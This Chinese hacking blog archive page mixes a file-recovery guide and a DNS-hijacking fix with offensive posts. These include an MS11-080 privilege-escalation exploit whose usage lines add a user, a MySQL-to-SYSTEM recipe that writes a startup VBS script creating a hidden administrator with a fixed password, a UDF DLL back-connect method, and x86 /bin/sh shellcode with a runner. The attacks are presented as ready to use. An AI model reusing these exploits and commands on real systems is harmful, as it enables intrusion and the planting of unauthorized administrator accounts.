存档

‘资源共享’ 分类的存档

Linux ext3/ext4数据恢复

2012年12月9日 6 条评论

测试环境:

Ubuntu 12.04 X86 +ext4

恢复文件使用的工具:extundelete(点击下载)

说明:当文件异常消失或者rm误删除后,避免在该分区中继续读、写、删除等操作。如果是恢复整块硬盘,请考虑安装extundelete所在分区的空间大小。

安装extundelete:

tar -xjf extundelete-0.2.2.tar.bz

cd extundelete-0.2.2

./configure

make&make install

 make -s all-recursive
Making all in src
Making install in src
     /usr/bin/install -c ‘extundelete’ ‘/usr/local/bin/extundelete’
说明安装成功。
--恢复文件
恢复/dev/sda5中所有数据
xtundelete /dev/sda5 --restore-all 
恢复/dev/sda5中/tool目录下所有数据
extundelete /dev/sda5 --restore-directory /tool
恢复/dev/sda5中某一个文件数据
extundelete /dev/sda5 --restore-files /etc/passwd
此程序不能指定恢复文件到指定目录,默认恢复的文件保存在extundelete所在目录RECOVERED_FILES下,
extundelete 路径为:/usr/local/bin/extundelete
文件恢复路径:/usr/local/bin/extundelete/RECOVERED_FILES
因此extundelete所在分区一定要大,否则会会提示空间不足。

注入漏洞利用工具模板 For PHP

2012年3月13日 3 条评论

作者:不走的钟
 
 今天有朋友在blog上问,这种漏洞存在,但究竟如何利用?(见原文)因为你提交字符后会跳转到index.php,这种注入,手入是没办法的,需要借用第三方工具或者自己写,我翻了下硬盘,N久以前写过类似的代码,扔出来大家可以参考,大家可以在这个基础上稍做修改便可使用:

阅读全文…

MS11080本地提权添加管理员EXP

2012年1月6日 13 条评论

        MS11080漏洞利用程序,源码来自国外,公开的exp是显示一个system权限的shell,不能带参数直接运行,按一个朋友需求改成可自定义cmd内容,使用方法如下:

XP  :   exp.exe XP “net user hacker /add”
2003:  exp.exe 2K3 “net user hacker /add”

非C,所以体积非常大,仅供学习参考!测试示意图如下:

点击下载

超级简单封杀114域名劫持

2010年8月11日 2 条评论

       你是不是常常遇到敲错一个域名的时候,会自动跳转到114的网站?如下图所示:

        这就是dns在搞怪,劫持了域名 。转向垃圾广告词我也忍了,但今天居然直接弹窗转到XX游戏网站上,可谓是无耻之极……

解决方法超级简单,估计大多数都知道,在这里记录下留给需要的人:

方法一、

打开IE->工具->Internet t选项->安全->受限站点 把刚才的站点添加进去

方法二、使用google的DNS 8.8.8.8

方法三、修改本地host文件,这个略为麻烦也不实用,像上图中这个并不是直接是XX.114.com的,不同的区域可能被劫持的域名不同。

推荐使用方法二!毕竟google不会那样无耻
 

分类: 资源共享 标签:

windows 2008 mysql 提权

2010年5月17日 1 条评论

作者:不走的钟
来源:http://www.007hack.com/?p=567
         mysql 5.1版本以上,必须把udf文件放到mysql安装目录下的lib/plugin下才能创建自定义函数,mysql into dumpfile并不能创建文件夹,所以mysql 5.1以上的版本,root权限提权就很困难了,目前已有的方法只有写启动项如下:

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user 007hack.com qwer1234!@#$qwe /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 007hack.com /add"",0) " );

 

windows 2008启动项:

C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs
select * from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";

 

写启动项缺陷:
1、需要服务器重启(如果管理员3389远程桌面登陆时注销了用户,再次3389连接时,这个脚本就会运行,添加一个管理员,不需要重启)。
2、安全软件可能会拦截。

 

补充:
如果mysql小于5.1是root权限,windows 2008一样可以拿到系统权限(mysql无降权处理)
1、mysql导出一个dll

SELECT udf FROM 007hack_tab INTO DUMPFILE 'c:/007hack.dll

//udf内容网上早有公开

2、创建一个函数

create function myconnect returns integer soname 'c:\\007hack.dll

//c盘要可以写,注意是”\\”

3、调用这个函数

select myconnect('".$chost."','".$cport."')

//这只是一个例子

Linux – linux/x86 execve()

2009年12月7日 1 条评论

/* 

*linux/x86 execve()51bytes 

* 08048080 <_start>: 

* 8048080: eb 1a jmp 804809c  

* 08048082 : 

* 8048082: 5e pop %esi 

* 8048083: 31 c0 xor %eax,%eax 

* 8048085: 88 46 07 mov %al,0×7(%esi) 

* 8048088: 8d 1e lea (%esi),%ebx 

* 804808a: 89 5e 08 mov %ebx,0×8(%esi) 

* 804808d: 89 46 0c mov %eax,0xc(%esi) 

* 8048090: b0 0b mov $0xb,%al 

* 8048092: 89 f3 mov %esi,%ebx 

* 8048094: 8d 4e 08 lea 0×8(%esi),%ecx 

* 8048097: 8d 4e 0c lea 0xc(%esi),%ecx 

* 804809a: cd 80 int $0×80 

* 0804809c : 

* 804809c: e8 e1 ff ff ff call 8048082  

* 80480a1: 2f das 

* 80480a2: 62 69 6e bound %ebp,0x6e(%ecx) 

* 80480a5: 2f das 

* 80480a6: 73 68 jae 8048110  

* 80480a8: 4a dec %edx 

* 80480a9: 41 inc %ecx 

* 80480aa: 41 inc %ecx 

* 80480ab: 41 inc %ecx 

* 80480ac: 41 inc %ecx 

* 80480ad: 4b dec %ebx 

* 80480ae: 4b dec %ebx 

* 80480af: 4b dec %ebx 

* 80480b0: 4b dec %ebx 

*/

#include<stdio.h> 

char shellcode[]=”\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d”

“\x1e\x89\x5e\x08\x89\x46″

“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1″

“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41″

“\x4b\x4b\x4b\x4b”; 

main() 

{ void (*routine)(); 

routine=&shellcode; 

printf(“size of shellcode: %dbytes\n”,sizeof(shellcode)); 

routine(); 

}

分类: 资源共享 标签: